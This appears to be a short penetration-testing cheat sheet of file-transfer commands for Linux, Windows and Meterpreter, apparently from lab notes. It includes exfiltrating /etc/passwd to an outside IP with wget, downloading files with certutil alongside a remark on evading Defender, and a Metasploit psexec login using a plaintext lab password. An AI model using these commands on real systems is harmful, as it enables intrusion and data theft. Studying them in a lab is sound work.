File Transfers
Linux
# HOST FILES
python -m SimpleHTTPServer 80
# OR
python3 -m http.server 80
python -m pyftpdlib -p 21 # FTP
# GRAB FILES
wget http://<ip>:80/secrets.txt
# RECEIVE FILES
nc -nvlp <port> file # redirect into new file
# SEND FILES
## nc
nc <ip> <port> < file
## wget, receiver has to clean the file
wget --post-file=/etc/passwd 192.168.202.128:8081
tail -n +10 file > clean_file # delete transfer data
Windows
# Windows Defender can block this, though there are ways to split files to bypass
# GRAB FILES - HTTP
C:\Users\fcastle>certutil -rulcache -f http://<ip>/secrets.txt secrets.txt
# GRAB FILES - FTP
C:\Users\fcastle>ftp <ip>
ftp> get <file>
Meterpreter
msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt
Last updated